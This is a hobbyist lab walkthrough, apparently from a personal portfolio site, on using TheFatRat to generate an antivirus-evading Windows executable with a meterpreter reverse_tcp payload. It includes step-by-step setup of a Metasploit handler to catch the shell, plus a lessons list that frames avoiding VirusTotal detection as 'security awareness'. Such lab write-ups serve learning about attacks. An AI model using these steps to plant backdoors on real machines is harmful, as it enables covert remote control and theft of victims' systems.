Fat-Rat Github payload generator walkthrough
Introduction:
Welcome to my project, an exploration into the capabilities and implications of the FatRat Github payload generator. As a security enthusiast and practitioner, I've embarked on this journey to delve deeper into the realm of cybersecurity tools, understanding their functionalities, and dissecting their potential applications. Join me as I navigate through the process of leveraging FatRat for creating backdoors and exploring the nuances of payload generation.
This is a paragraph where you can add any information you want to share with website visitors. Click here to edit the text, change the font and make it your own.
Steps
1. Github clone https://github.com/screetsec/TheFatRat
2. Cd TheFatRat
3. Chmod +x setup.sh && setup.sh/
4. Sudo su root
5. Run fatrat (this will start the tool)
6. It will warn us not to upload to virus total (so we will not)
7. We will create a backdoor with option 6
8. We will use option 2 create exe file C# and Powershell this is FUD (fully undetectable)
9. Set LHOST [HOST IP]
10. SET LPORT 5555
11. Enter the basename of out put file I named mine ratbackdoor
12.We then use option 3 windows/meterpreter/reverse_tcp
13. Backdoor is then created and is in /root/Fatrat_Generated/ratbackdoor.exe
14.This tool doesn't open a listener so we may have to open a second or go back to main menu and use option 10
15. Open another terminal cd /root/Fatrat_Generated
16. Cp ratbackdoor.exe /home/kali/Desktop
17. Then copy exe to windows 10 device
18. We will then use command use exploit/multi/handler/
19. Set payload windows/meterpreter/reverse_tcp
20. Set LHOST 10.0.1.67
21. Set LPORT 5555
22. Run
23. Then click on our backdoor in windows 10 machine.
Lessons Learned
-
Tool Familiarization: The initial step was to clone the FatRat repository from Github and navigate to its directory. This acquainted me with the structure of the tool and its setup process.
-
Execution Permissions: Understanding the importance of proper permissions, I ensured that the setup script was executable using the chmod command before running it.
-
Root Privileges: As certain functionalities of FatRat require elevated privileges, I transitioned to root using sudo su root to execute the tool seamlessly.
-
Payload Generation: The core functionality of FatRat lies in its ability to generate various types of payloads. By selecting options within the tool, I learned to create backdoors tailored to specific scenarios.
-
Undetectable Payloads: Exploring the options provided by FatRat, I discovered techniques to generate Fully Undetectable (FUD) payloads using C# and Powershell scripts, enhancing the stealth and effectiveness of the backdoors.
-
Payload Customization: Through setting parameters such as LHOST and LPORT, I gained insights into customizing payloads to suit different network configurations and operational requirements.
-
Listener Management: Recognizing the need to manage listeners for incoming connections, I became adept at initiating listeners either within the tool or separately using commands.
-
Deployment Strategies: After generating the backdoor executable, I experimented with different deployment strategies, including transferring the payload to target machines and initiating connections from the attacker's end.
-
Operational Considerations: The process highlighted the importance of operational considerations such as managing multiple terminals, file transfers, and ensuring seamless communication between attacker and target systems.
-
Security Awareness: Finally, the experience underscored the significance of security awareness, including cautionary measures such as refraining from uploading payloads to public repositories like VirusTotal to avoid detection.
​
In conclusion, my journey through the FatRat payload generator not only enhanced my technical skills but also deepened my understanding of cybersecurity methodologies and the intricate dance between attackers and defenders in the digital landscape. Through this project, I aim to share my insights and contribute to the collective knowledge of the cybersecurity community.